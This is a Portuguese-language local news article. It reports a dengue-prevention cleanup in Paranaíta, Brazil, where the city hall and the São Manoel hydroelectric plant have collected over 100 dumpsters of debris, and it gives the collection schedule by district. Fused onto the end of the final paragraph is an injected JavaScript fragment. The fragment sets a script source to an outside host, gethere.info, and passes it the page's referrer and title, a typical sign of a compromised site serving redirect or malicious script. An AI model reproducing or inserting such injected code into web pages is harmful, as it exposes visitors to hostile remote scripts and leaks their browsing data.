Capa / Cidades / Paranaíta contra a dengue: ação coleta mais de 100 caçambas de entulho

Paranaíta contra a dengue: ação coleta mais de 100 caçambas de entulho

Paranaíta contra a dengue ação coleta mais de 100 caçambas de entulho1Assessoria de Imprensa

Mais de 100 caçambas de lixo e entulho foram recolhidas nos primeiros dias da ação contra a dengue realizada pela Prefeitura de Paranaíta em parceria com a UHE São Manoel. O montante foi retirado no Setor Industrial. O volume tende a aumentar, já que as equipes atuam, ainda esta semana, no Setor Sul 2.
De acordo com o Supervisor da Vigilância Ambiental, Erico Baukat, a quantidade de entulho recolhido nos primeiros dias é acima do esperado. Como exemplo, ele citou ação semelhante ocorrida num dos mais bairros mais populosos de Cuiabá, o Pedra 90, onde residem mais de 23 mil pessoas. Do local foram recolhidas 80 cargas de lixo.
A ação em parceria com a empresa São Manoel teve início no dia 21 e será realizada durante dois meses. Dois caminhões e uma máquina pá carregadeira foram cedidos ao município que coordena a retirada do lixo, cujo acúmulo é um dos maiores fatores que contribuem para proliferação do mosquito Aedes aegypti. Entre os materiais que serão coletados estão resíduos de construção civil, móveis velhos, pneus e outros capazes de acumular água e permitir a reprodução do Aedes aegypti – que, além da dengue, transmite o zika vírus e a febre chikungunya.
“A previsão é que nesses 60 dias a cidade toda seja atendida, inclusive onde já havia sido feita a ação. A orientação é que as pessoas prestem atenção nos informes e depositem o lixo em local de fácil coleta”, observa Baukat.
O supervisor orienta os moradores a depositar o lixo que será recolhido pela equipe o mais próximo da beira da estrada, longe dos muros e que não sejam colocados entre arvores, dificultando, dessa forma, que a máquina tenha acesso. “Também tem cuidar com os bueiros e eventuais fossas sépticas fora dos muros para que não ocorram acidentes”, reforça Erico, citando que as pessoas devem retirar os entulhos somente quando forem informadas que a ação acontecerá em seu setor.
Pelo cronograma da equipe, depois do Setor Sul 2 devem ser visitados em sequência o Sul 1, Palmeiras, Beira Rio e Centro.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top